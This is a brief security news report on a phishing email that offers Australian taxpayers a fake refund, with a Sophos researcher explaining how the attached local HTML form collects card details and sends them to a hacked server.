Aussie taxpayers targeted in refund scam

According to Paul Ducklin, head of technology, Asia Pacific, with Sophos, scammers are trying to convince Aussie taxpayers that their refunds are ready, despite that fact that the tax year ends in June.

But apparently scammers are not aware of the subtleties of the Australian tax season. They are sending an email now saying that taxpayers are due refunds. The email says: “To access your tax refund, please follow the steps below: download the Tax Refund Form attached to this email, open it in a browser, and follow the instructions on your screen.” The email is signed, “the Australian government.”

Instead of asking recipients to click on a link, the email ask that a form be downloaded and opened in a browser. The form asks for name, date of birth, address, and of course credit card number, expiration date, and card verification number.

You are then directed to a button marked “continue”, which leads to a hacked server in the US.

“You might think that a web page which presents a form from one location (in this case, your hard disk) but submits the results to a completely different site would raise a warning, at least at an Internet Explorer security setting of ‘High’. But it does not, presumably because this behaviour is considered unexceptional on legitimate sites”, Ducklin explained in a blog.

What’s Hot on Infosecurity Magazine?